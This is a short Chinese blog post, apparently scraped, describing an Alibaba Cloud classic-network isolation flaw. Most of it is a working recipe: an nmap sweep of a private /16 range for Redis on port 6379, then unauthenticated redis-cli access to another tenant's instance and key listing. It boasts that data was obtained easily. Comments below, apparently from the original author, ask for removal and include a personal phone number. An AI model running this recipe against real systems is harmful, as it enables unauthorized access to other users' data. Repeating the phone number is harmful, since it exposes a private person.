阿里云用户隔离漏洞

之前文章提到了阿里云经典网络问题,这里操作一把。

1,首先扫端口

nmap -v -sT 10.161.91.0/16 -p 6379 –open

发现一些IP和端口

 

5269c54a87d498e1865e3a0c027cefd9

2,随便找一个登录

redis-cli -c -h 10.161.29.xx -p 6379

这里用-c的原因是redis采用的是集群,允许集群模式

scan 0看下数据:

38fd6ae9c98efba35b905cd3d1dbbd7b

发现很轻易就获得了数据!!

《阿里云用户隔离漏洞》有8个想法

  1. 这个文章是我曾经在北邮论坛写的,感觉有隐私已经删掉,却被你抓取,麻烦你撤去该抓取条目。http://www.dadaaierer.com/bbs/detail?id=2580

  2. 这个文章是我曾经在北邮论坛写的,感觉有隐私已经删掉,却被你抓取,麻烦你撤去该抓取条目。http://www.dadaaierer.com/bbs/detail?id=2580我的联系方式是18811798569

发表评论

电子邮件地址不会被公开。 必填项已用*标注


*